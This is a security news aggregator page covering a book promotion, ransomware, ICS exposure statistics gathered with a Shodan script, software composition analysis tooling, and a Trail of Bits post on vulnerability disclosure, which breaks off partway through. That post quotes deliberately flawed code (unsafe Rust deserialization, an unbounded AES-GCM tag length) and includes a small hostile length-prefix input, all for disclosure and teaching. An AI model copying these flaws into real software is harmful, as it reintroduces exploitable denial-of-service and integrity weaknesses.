News feed aggregator

Infocon: green

ISC Stormcast For Tuesday, April 23rd, 2024 https://isc.sans.edu/podcastdetail/8950
Categories: Security Posts

Book Day at @0xWord: 10% discount coupon "DIALIBRO2024" for #Diadellibro2024

Un informático en el lado del mal - 4 hours 41 mins ago
As we do every year, 0xWord is joining the Book Day celebration, so from right now until midnight on April 28 you can get every product in the 0xWord store with a 10% discount by using the code: DIALIBRO2024.
Figure 1: Book Day at 0xWord: 10% discount coupon "DIALIBRO2024" for #Diadellibro2024
The discount code, which will be active until 23:59 on Sunday, April 28, is DIALIBRO2024, so if you use it you will get a 10% discount on all 0xWord material in the store, including the Cálico Electrónico material, the Offer Packs, the VBOOKs, the EVIL:ONE comics in 0xWord Comics, the novels in 0xWord Pocket, and the new 0xWord Brain titles.
Figure 2: Buy your hacking books at 0xWord
You can also increase your 0xWord discounts by using your MyPublicInbox Tempos, in two different ways: by sending Tempos to 0xWord and getting an extra discount, or by exchanging your MyPublicInbox Tempos for a 0xWord discount code. Here is how it works.
Send your Tempos to 0xWord and receive the discount
The idea is very simple: we have created a 0xWord Public Inbox on MyPublicInbox, and the Tempo transfer module between accounts is available whenever the recipient is a Public Profile on the platform. For these transfers to be possible, the recipient Public Profile must first be in your address book (Agenda).
Figure 3: 0xWord profile on MyPublicInbox, with the "Add to address book" option.
https://MyPublicInbox.com/0xWord

To add a Public Profile to your address book, just sign in to MyPublicInbox and, with your session open, go to the profile's web page. In this case, go to the URL of the 0xWord public profile on MyPublicInbox - https://MyPublicInbox.com/0xWord - where the "Add to address book" option will appear. Once this is done, you can go to the Agenda section of your MyPublicInbox mailbox and the 0xWord Public Profile should be there.
Figure 4: Once you add it, it will appear in your address book
Once it is in your address book, it is as easy as going to your profile - accessed by clicking the round image with your photo at the top - and opening the Transfer area. From there, select the 0xWord Public Inbox and the number of Tempos you want to transfer, and in the description state that it is for receiving a discount code to use in the 0xWord store.
Figure 5: Transfer area in your MyPublicInbox profile
Don't worry about the exact wording, because we process these manually, just like the orders placed in the store.
Redeem 500 Tempos for a €5 discount code
The last option is quite simple. Just go to the Redeem Tempos -> Store Vouchers section and "Buy" the €5 code for 500 Tempos. It is the same as sending the transfer, but as a 500-Tempo package and fully automated, so as soon as you click buy you will receive the discount code, which you can then use in the 0xWord.com store.
Figure 6: Redeem Tempos for 0xWord book codes
So, if you want to get our computer security & hacking books while taking advantage of these discounts, between the DIALIBRO2024 code and your MyPublicInbox Tempos you can do it very easily and much, much, much more cheaply, and you will be supporting the wonderful project that is 0xWord.com.
¡Saludos Malignos!
Author: Chema Alonso (Contact Chema Alonso)


Follow Un informático en el lado del mal RSS 0xWord
- Contact Chema Alonso on MyPublicInbox.com
Categories: Security Posts

Change Healthcare Finally Admits It Paid Ransomware Hackers—and Still Faces a Patient Data Leak

Wired: Security - 4 hours 47 mins ago
The company belatedly conceded both that it had paid the cybercriminals extorting it and that patient data nonetheless ended up on the dark web.
Categories: Security Posts

ISC Stormcast For Tuesday, April 23rd, 2024 https://isc.sans.edu/podcastdetail/8950, (Tue, Apr 23rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Windows vulnerability reported by the NSA exploited to install Russian malware

ArsTechnica: Security Content - Mon, 2024/04/22 - 22:36
Kremlin-backed hackers have been exploiting a critical Microsoft vulnerability for four years in attacks that targeted a vast array of organizations with a previously undocumented tool, the software maker disclosed Monday. When Microsoft patched the vulnerability in October 2022—at least two years after it came under attack by the Russian hackers—the company made no mention that it was under active exploitation. As of publication, the company’s advisory still made no mention of the in-the-wild targeting. Windows users frequently prioritize the installation of patches based on whether a vulnerability is likely to be exploited in real-world attacks. Exploiting CVE-2022-38028, as the vulnerability is tracked, allows attackers to gain system privileges, the highest available in Windows, when combined with a separate exploit. Exploiting the flaw, which carries a 7.8 severity rating out of a possible 10, requires low existing privileges and little complexity. It resides in the Windows print spooler, a printer-management component that has harbored previous critical zero-days. Microsoft said at the time that it learned of the vulnerability from the US National Security Agency.
Categories: Security Posts

Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

Krebs - Mon, 2024/04/22 - 22:07
The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced last week to nine years in a penal colony for accepting a USD $1.7 million bribe to ignore the activities of a prolific Russian cybercrime group that hacked thousands of e-commerce websites. The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.
Image caption: A now-defunct carding shop that sold stolen credit cards and invoked 45’s likeness and name.
As reported by The Record, a Russian court last week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was seeking a “roof,” a well-placed, corrupt law enforcement official who could be counted on to both disregard their illegal hacking activities and run interference with authorities in the event of their arrest. Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia. In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data. They also seized multiple carding shops run by the gang, including Ferum Shop, Sky-Fraud, and Trump’s Dumps, a popular fraud store that invoked the 45th president’s likeness and promised to “make credit card fraud great again.” All of the domains seized in that raid were registered by an IT consulting company in Perm called Get-net LLC, which was owned in part by Artem Zaitsev — one of the six men arrested. Zaitsev reportedly was a well-known programmer whose company supplied services and leasing to the local FSB field office.
Image caption: The message for Trump’s Dumps users left behind by Russian authorities that seized the domain in 2022.
Russian news sites report that Internal Affairs officials with the FSB grew suspicious when Tsaregorodtsev became a little too interested in the case following the hacking group’s arrests. The former FSB agent had reportedly assured the hackers he could have their case transferred and that they would soon be free. But when that promised freedom didn’t materialize, four of the defendants pulled the walls down on the scheme and brought down their own roof. The FSB arrested Tsaregorodtsev and seized $154,000 in cash, 100 gold bars, real estate and expensive cars. At Tsaregorodtsev’s trial, his lawyers argued that their client wasn’t guilty of bribery per se, but that he did admit to fraud because he was ultimately unable to fully perform the services for which he’d been hired. The Russian news outlet Kommersant reports that all four of those who cooperated were released with probation or correctional labor. Zaitsev received a sentence of 3.5 years in prison, and defendant Alexander Kovalev got four years.
In 2017, KrebsOnSecurity profiled Trump’s Dumps, and found the contact address listed on the site was tied to an email address used to register more than a dozen domains that were made to look like legitimate Javascript calls many e-commerce sites routinely make to process transactions — such as “js-link[dot]su,” “js-stat[dot]su,” and “js-mod[dot]su.” Searching on those malicious domains revealed a 2016 report from RiskIQ, which shows the domains featured prominently in a series of hacking campaigns against e-commerce websites. According to RiskIQ, the attacks targeted online stores running outdated and unpatched versions of shopping cart software from Magento, Powerfront and OpenCart.
Those shopping cart flaws allowed the crooks to install “web skimmers,” malicious Javascript used to steal credit card details and other information from payment forms on the checkout pages of vulnerable e-commerce sites. The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.
Categories: Security Posts

The Next US President Will Have Troubling New Surveillance Powers

Wired: Security - Mon, 2024/04/22 - 18:59
Over the weekend, President Joe Biden signed legislation not only reauthorizing a major FISA spy program but expanding it in ways that could have major implications for privacy rights in the US.
Categories: Security Posts

It appears that the number of industrial devices accessible from the internet has risen by 30 thousand over the past three years, (Mon, Apr 22nd)

SANS Internet Storm Center, InfoCON: green - Mon, 2024/04/22 - 12:21
It has been nearly three years since we last looked at the number of industrial devices (or, rather, devices that communicate with common OT protocols, such as Modbus/TCP, BACnet, etc.) that are accessible from the internet[1]. Back in May of 2021, I wrote a slightly optimistic diary mentioning that there were probably somewhere between 74.2 thousand (according to Censys) and 80.8 thousand (according to Shodan) such systems, and that based on long-term data from Shodan, it appeared as though there was a downward trend in the number of these systems. Given that a few months ago, a series of incidents related to internet-exposed PLCs with default passwords was reported[2], and CISA has been releasing more ICS-related advisories than any other kind for a while now[3], I thought it might be a good time to go over the current numbers and see how the situation has changed over the past 35 months.
At first glance, the current number of ICS-like devices accessible from the internet would seem to be somewhere between 61.7 thousand (the number of “ICS” devices detected by Shadowserver[4]) and 237.2 thousand (the number of “ICS” devices detected by Censys[5]), with Shodan reporting an in-between number of 111.1 thousand[6]. It should be noted, though, that even though none of these services necessarily detects all OT devices correctly, the number reported by Censys seems to be significantly overinflated by the fact that the service uses a fairly wide definition of what constitutes an “ICS system” and classifies as such even devices that do not communicate using any of the common industrial protocols. If we do a search limited only to devices that use one of the most common protocols that Censys can detect (e.g., Modbus, Fox, EtherNet/IP, BACnet, etc.), we get a much more believable/comparable number of 106.2 thousand[7]. It is therefore probable that the real number of internet-connected ICS systems is currently somewhere between 61 and 111 thousand, with data from Shodan and Censys both showing an increase of approximately 30 thousand from May 2021. It should be noted, though, that some of the detected devices are certain to be honeypots – of the 106.2 thousand systems reported by Censys, 307 devices were explicitly classified as such[8]; however, it is likely that the real number of honeypots among detected systems is significantly higher.
If we take a closer look at some of the most often detected industrial protocols, it quickly becomes obvious that – with the exception of BACnet – the data reported by all three services varies significantly between different protocols. It also becomes apparent that the large difference between the number of ICS systems detected by Shodan and Censys (> 100k) and the much smaller number detected by Shadowserver (61k) is caused mainly by a significantly lower number of detected devices that use Modbus on the part of Shadowserver. For comparison, at the time of writing, Censys detects 54,770 internet-exposed devices using this protocol, while Shodan detects 33,036 such devices, and Shadowserver detects only about 6,300 of them. While on the topic of Modbus, it is worth noting that the number of ICS-like devices that support this protocol detected by both Shodan and Censys has increased significantly since 2021, and this increase seems to account for most of the overall rise in the number of detected ICS devices. In fact, if we take a closer look at the changes over time, it is clear that the downward trend, which I mentioned in the 2021 diary, didn't last too long.
Looking at data gathered from Shodan using my TriOp tool[9], it seems that shortly after I published the diary, the number of detected ICS devices rose significantly, and it has oscillated around approximately 100 thousand ever since. Although data provided by Shodan are hardly exact, the hypothesis that the number of internet-connected ICS devices has not fallen appreciably for at least the last two years seems to be supported by data from Shadowserver, as you may see in the following chart. Nevertheless, even though there has therefore probably not been any notable decrease in the number of internet-connected ICS devices, this doesn't mean that there have not been changes in the types of devices and the protocols they communicate with. As the following chart from Shodan shows, these aspects have changed quite a lot over time.
It is also worth mentioning that these charts and the aforementioned numbers describe the overall situation on the global internet, and therefore say nothing about the state of affairs in different countries around the world. This is important since although there may not have been any appreciable decrease in the number of internet-exposed ICS devices globally, it seems that the number of these devices has decreased significantly in multiple countries in the past few years – most notably in the United States, as you may see in the following chart from Shodan (though it is worth noting that Shadowserver saw a much smaller decrease for the US – from approximately 32 thousand ICS devices to the current 29.5 thousand devices[10]). Unfortunately, the fact that in some countries the number of internet-connected ICS devices has fallen also means that there are (most likely) multiple countries where it has just as significantly risen, given that we have not seen an overall, global decrease… In fact, there must be countries where it rose much more significantly, given the aforementioned overall increase of approximately 30 thousand ICS systems detected by both Shodan and Censys globally.
So, while I ended the 2021 diary stating a hope that the situation might improve in time and that the number of industrial/OT systems accessible from the internet would decrease, I will end this one on a slightly more pessimistic note – hoping that the situation doesn't worsen just as significantly in the next three years as it did in the past three…
[1] https://isc.sans.edu/diary/Number+of+industrial+control+systems+on+the+internet+is+lower+then+in+2020but+still+far+from+zero/27412
[2] https://therecord.media/cisa-water-utilities-unitronics-plc-vulnerability
[3] https://www.cisa.gov/news-events/cybersecurity-advisories?page=0
[4] https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=30&source=ics&style=stacked
[5] https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=labels%3D%60ics%60
[6] https://www.shodan.io/search?query=tag%3Aics
[7] https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=%28labels%3D%60ics%60%29+and+%28services.service_name%3D%60MODBUS%60+or+services.service_name%3D%60FOX%60+or+services.service_name%3D%60BACNET%60+or+services.service_name%3D%60EIP%60+or+services.service_name%3D%60S7%60+or+services.service_name%3D%60IEC60870_5_104%60%29
[8] https://search.censys.io/search?resource=hosts&virtual_hosts=EXCLUDE&q=%28%28labels%3D%60ics%60%29+and+%28services.service_name%3D%60MODBUS%60+or+services.service_name%3D%60FOX%60+or+services.service_name%3D%60BACNET%60+or+services.service_name%3D%60EIP%60+or+services.service_name%3D%60S7%60+or+services.service_name%3D%60IEC60870_5_104%60%29%29+and+labels%3D%60honeypot%60
[9] https://github.com/NettleSec/TriOp
[10] https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&d1=2022-04-23&d2=2024-04-22&source=ics&geo=US&style=stacked -----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
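For readers who want to reproduce the headline Shodan figure cited in the diary above, the official shodan Python library can do it in a few lines. The following is only a minimal sketch: it assumes you have a Shodan API key with query credits (the key below is a placeholder) and uses the same tag:ics query shown in reference [6]; the exact totals change from day to day.

# Minimal sketch: count internet-exposed "ICS"-tagged devices via the Shodan API.
# Assumptions: a valid API key with query credits; the tag:ics filter as the
# working definition of an ICS device (matching reference [6] above).
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"  # placeholder, not a real key

api = shodan.Shodan(API_KEY)

# count() returns only totals and facets, so it does not page through results.
result = api.count("tag:ics", facets=[("country", 10)])

print(f"Internet-exposed ICS-tagged devices (Shodan): {result['total']}")
for bucket in result["facets"]["country"]:
    print(f"  {bucket['value']}: {bucket['count']}")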
Categories: Security Posts

Introduction to Software Composition Analysis and How to Select an SCA Tool

AlienVault Blogs - Wed, 2024/04/17 - 12:00
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Software code is constantly growing and becoming more complex, and there is a worrying trend: an increasing number of open-source components are vulnerable to attacks. A notable instance was the Apache Log4j library vulnerability, which posed serious security risks. And this is not an isolated incident. Using open-source software necessitates thorough Software Composition Analysis (SCA) to identify these security threats. Organizations must integrate SCA tools into their development workflows while also being mindful of their limitations. Why SCA Is Important Open-source components have become crucial to software development across various industries. They are fundamental to the construction of modern applications, with estimates suggesting that up to 96% of the total code bases contain open-source elements. Assembling applications from diverse open-source blocks presents a challenge, necessitating robust protection strategies to manage and mitigate risks effectively. Software Composition Analysis is the process of identifying and verifying the security of components within software, especially open-source ones. It enables development teams to efficiently track, analyze, and manage any open-source element integrated into their projects. SCA tools identify all related components, including libraries and their direct and indirect dependencies. They also detect software licenses, outdated dependencies, vulnerabilities, and potential exploits. Through scanning, SCA creates a comprehensive inventory of a project's software assets, offering a full view of the software composition for better security and compliance management. Although SCA tools have been available for quite some time, the recent open-source usage surge has cemented their importance in application security. Modern software development methodologies, such as DevSecOps, emphasize the need for SCA solutions for developers. The role of security officers is to guide and assist developers in maintaining security across the Software Development Life Cycle (SDLC), ensuring that SCA becomes an integral part of creating secure software. Objectives and Tasks of SCA Tools Software Composition Analysis broadly refers to security methodologies and tools designed to scan applications, typically during development, to identify vulnerabilities and software license issues. For effective management of open-source components and associated risks, SCA solutions help navigate several tasks: 1) Increasing Transparency A developer might incorporate various open-source packages into their code, which in turn may depend on additional open-source packages unknown to the developer. These indirect dependencies can extend several levels deep, complicating the understanding of exactly which open-source code the application uses. Reports indicate that 86% of vulnerabilities in node.js projects stem from transitive (indirect) dependencies, with similar statistics in the Java and Python ecosystems. This suggests that most security vulnerabilities in applications often originate from open-source code that developers might not even be aware of. For cloud applications, open-source components in container images can also pose transparency challenges, requiring identification and vulnerability scanning. 
While the abstraction containers offer to programmers is beneficial for development, it simultaneously poses a security risk, as it can obscure the details of the underlying components. 2) Grasping the Logic of Dependencies Accurately identifying dependencies - and the vulnerabilities they introduce - demands a comprehensive understanding of each ecosystem's unique handling of them. It is crucial for an SCA solution to recognize these nuances and avoid generating false positives. 3) Prioritizing Vulnerabilities Due to the limited resources at the disposal of developers and security professionals, prioritizing vulnerabilities becomes a significant challenge without the required data and knowledge. While the Common Vulnerability Scoring System (CVSS) offers a method for assessing vulnerabilities, its shortcomings make it somewhat challenging to apply effectively. The main issues with CVSS stem from the variance in environments, including how they are operated, designed, and put together. Additionally, CVSS scores do not consider the age of a vulnerability or its involvement in exploit chains, further complicating their usage. 4) Building an Updated, Unified Vulnerability Database A vast array of analytical data on vulnerabilities is spread out over numerous sources, including national databases, online forums, and specialized security publications. However, there is often a delay in updating these sources with the latest vulnerability information. This delay in reporting can be critically detrimental. SCA tools help address this issue by aggregating and centralizing vulnerability data from a wide range of sources. 5) Speeding Up Secure Software Development Before the code progresses in the release process, it must undergo a security review. If the services tasked with checking for vulnerabilities do not do so swiftly, this can slow down the entire process. The use of AI test automation tools offers a solution to this issue. They enable the synchronization of development and vulnerability scanning processes, preventing unforeseen delays. The challenges mentioned above have spurred the development of the DevSecOps concept and the "Shift Left" approach, which places the responsibility for security directly on development teams. Guided by this principle, SCA solutions enable the verification of the security of open-source components early in the development process, ensuring that security considerations are integrated from the outset. Important Aspects of Choosing and Using SCA Tools Software Composition Analysis systems have been in existence for over a decade. However, the increasing reliance on open-source code and the evolving nature of application assembly, which now involves numerous components, have led to the introduction of various types of solutions. SCA solutions range from open-source scanners to specialized commercial tools, as well as comprehensive application security platforms. Additionally, some software development and maintenance solutions now include basic SCA features. When selecting an SCA system, it is helpful to evaluate the following capabilities and parameters: ● Developer-Centric Convenience Gone are the days when security teams would simply pass a list of vulnerabilities to developers to address. DevSecOps mandates a greater level of security responsibility on developers, but this shift will not be effective if the tools at their disposal are counterproductive. An SCA tool that is challenging to use or integrate will hardly be beneficial. 
Therefore, when selecting an SCA tool, make sure it can: - Be intuitive and straightforward to set up and use - Easily integrate with existing workflows - Automatically offer practical recommendations for addressing issues ● Harmonizing Integration in the Ecosystem An SCA tool's effectiveness is diminished if it cannot accommodate the programming languages used to develop your applications or fit seamlessly into your development environment. While some SCA solutions might offer comprehensive language support, they might lack, for example, a plugin for Jenkins, which would allow for the straightforward inclusion of application security testing within the build process or modules for the Integrated Development Environment (IDE). ● Examining Dependencies Since many vulnerabilities are tied to dependencies, whose exploitation can often only be speculated, it is important when assessing an SCA tool to verify that it can accurately understand all the application's dependencies. This ensures those in charge have a comprehensive view of the security landscape. It would be good if your SCA tool could also provide a visualization of dependencies to understand the structure and risks better. ● Identifying Vulnerabilities An SCA tool's ability to identify vulnerabilities in open-source packages crucially depends on the quality of the security data it uses. This is the main area where SCA tools differ significantly. Some tools may rely exclusively on publicly available databases, while others aggregate data from multiple proprietary sources into a continuously updated and enriched database, employing advanced analytical processes. Even then, nuances in the database's quality and the accuracy and comprehensiveness of its intelligence can vary, impacting the tool's effectiveness. ● Prioritizing Vulnerabilities SCA tools find hundreds or thousands of vulnerabilities, a volume that can swiftly become unmanageable for a team. Given that it is practically unfeasible to fix every single vulnerability, it is vital to strategize which fixes will yield the most significant benefit. A poor prioritization mechanism, particularly one that leads to an SCA tool frequently triggering false positives, can create unnecessary friction and diminish developers' trust in the process. ● Fixing Vulnerabilities Some SCA tools not only detect vulnerabilities but also proceed to the logical next step of patching them. The range of these patching capabilities can differ significantly from one tool to another, and this variability extends to the recommendations provided. It is one matter to suggest upgrading to a version that resolves a specific vulnerability; it is quite another to determine the minimal update path to prevent disruptions. For example, some tools might automatically generate a patch request when a new vulnerability with a recommended fix is identified, showcasing the advanced and proactive features that differentiate these tools in their approach to securing applications. ● Executing Oversight and Direction It is essential to choose an SCA tool that offers the controls necessary for managing the use of open-source code within your applications effectively. The ideal SCA tool should come equipped with policies that allow for detailed fine-tuning, enabling you to granularly define and automatically apply your organization's specific security and compliance standards. ● Reports   Tracking various open-source packages over time, including their licenses, serves important purposes for different stakeholders. 
Security teams, for example, may want to evaluate the effectiveness of SCA processes by monitoring the number and remediation of identified vulnerabilities. Meanwhile, legal departments might focus on compiling an inventory of all dependencies and licenses to ensure the organization's adherence to compliance and regulatory requirements. Your selected SCA tool should be capable of providing flexible and detailed reporting to cater to the diverse needs of stakeholders. ● Automation and Scalability Manual tasks associated with SCA processes often become increasingly challenging in larger development environments. Automating tasks like adding new projects and users for testing or scanning new builds within CI/CD pipelines not only enhances efficiency but also helps avoid conflicts with existing workflows. Modern SCA tools should use machine learning for improved accuracy and data quality. Another critical factor to consider is the availability of a robust API, which enables deeper integration. Moreover, the potential for interaction with related systems, such as Security Orchestration, Automation, and Response (SOAR) and Security Information and Event Management (SIEM), in accessing information on security incidents, is also noteworthy. ● Application Component Management Modern applications consist of numerous components, each requiring scanning and protection. A modern SCA tool should be able to scan container images for vulnerabilities and seamlessly integrate into the workflows, tools, and systems used for building, testing, and running these images. Advanced solutions may also offer remedies for identified flaws in containers. Conclusion Every organization has unique requirements influenced by factors like technology stack, use case, budget, and security priorities. There is no one-size-fits-all solution for Software Composition Analysis. However, by carefully evaluating the features, capabilities, and integration options of various SCA tools, organizations can select a solution that best aligns with their specific needs and enhances their overall security posture. The chosen SCA tool should accurately identify all open-source components, along with their associated vulnerabilities and licenses.
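To make the automation and "speeding up secure software development" points above concrete, here is a minimal sketch of a CI gate built around npm audit --json. It assumes npm 7 or later on PATH, a package-lock.json in the working directory, and that the JSON report exposes severity counts under metadata.vulnerabilities (the exact layout varies between npm versions); the high/critical threshold is likewise an arbitrary choice for the sketch, not a recommendation from the article.

#!/usr/bin/env python3
"""Illustrative CI gate around `npm audit --json` (sketch only)."""
import json
import subprocess
import sys

# Fail the build if any finding at or above these severities is reported.
BLOCKING = {"high", "critical"}

def main() -> int:
    # npm audit exits non-zero when it finds vulnerabilities, so don't use check=True.
    proc = subprocess.run(["npm", "audit", "--json"], capture_output=True, text=True)
    report = json.loads(proc.stdout or "{}")

    # Severity counts; field layout differs between npm versions, adjust as needed.
    counts = report.get("metadata", {}).get("vulnerabilities", {})
    blocking_total = sum(counts.get(sev, 0) for sev in BLOCKING)

    print("npm audit severity counts:", counts)
    if blocking_total:
        print(f"Failing build: {blocking_total} high/critical findings")
        return 1
    return 0

if __name__ == "__main__":
    sys.exit(main())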
Categories: Security Posts

5 reasons to strive for better disclosure processes

By Max Ammann
This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes. The five bugs are detailed in the cases below. Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner. In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post. Case 1: Undefined behavior in borsh-rs Rust library The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years. During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug. The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub. I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed. The following code contained the bug that caused undefined behavior: impl<T> BorshDeserialize for Vec<T> where T: BorshDeserialize, { #[inline] fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> { let len = u32::deserialize(reader)?; if size_of::<T>() == 0 { let mut result = Vec::new(); result.push(T::deserialize(reader)?); let p = result.as_mut_ptr(); unsafe { forget(result); let len = len as usize; let result = Vec::from_raw_parts(p, len, len); Ok(result) } } else { // TODO(16): return capacity allocation when we can safely do that. let mut result = Vec::with_capacity(hint::cautious::<T>(len)); for _ in 0..len { result.push(T::deserialize(reader)?); } Ok(result) } } } Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150) The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable. The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness. 
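Cases 1 and 4 in this post share the same underlying anti-pattern: pre-allocating memory based on a length field taken from untrusted input. The short Python sketch below is not the borsh-rs or num-bigint code (that is the Rust shown in Figures 1 and 4); it is only a language-neutral illustration of why validating the declared length matters, and the 16 MiB cap is an arbitrary assumption.

import struct

MAX_DECLARED_LEN = 16 * 1024 * 1024  # arbitrary safety cap for this sketch

def read_items_unsafe(buf: bytes) -> list:
    # Reads a u32 length prefix and pre-allocates that many slots.
    # A 4-byte header claiming ~4 billion items is enough to exhaust memory.
    (n,) = struct.unpack_from("<I", buf, 0)
    return [None] * n  # allocation driven entirely by attacker-controlled n

def read_items_safe(buf: bytes) -> list:
    (n,) = struct.unpack_from("<I", buf, 0)
    if n > MAX_DECLARED_LEN or 4 + n > len(buf):
        # Reject lengths that the payload cannot actually back.
        raise ValueError(f"declared length {n} is implausible")
    return list(buf[4 : 4 + n])

# A 4-byte message that *claims* to contain 2**32 - 1 items:
hostile = struct.pack("<I", 2**32 - 1)
# read_items_unsafe(hostile) would try to allocate billions of slots;
# the checked variant handles honest input and rejects the hostile one.
print(len(read_items_safe(struct.pack("<I", 3) + b"abc")))  # 3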
Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI In July, I disclosed multiple DoS vulnerabilities in four Ethereum ABI–parsing libraries, which were difficult to report because I had to reach out to multiple parties. The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing: https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort. Read more about the technical details of this bug in the blog post Billion times emptiness. Case 3: Missing limit on authentication tag length in Expo In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software. When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, secure@expo.io, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year. Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had. Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext: /* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException { byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8); byte[] ciphertextBytes = cipher.doFinal(plaintextBytes); String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP); String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP); int authenticationTagLength = gcmSpec.getTLen(); JSONObject result = new JSONObject() .put(CIPHERTEXT_PROPERTY, ciphertext) .put(IV_PROPERTY, ivString) .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength); postEncryptionCallback.run(promise, result); return result; } Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java) For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore. An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. 
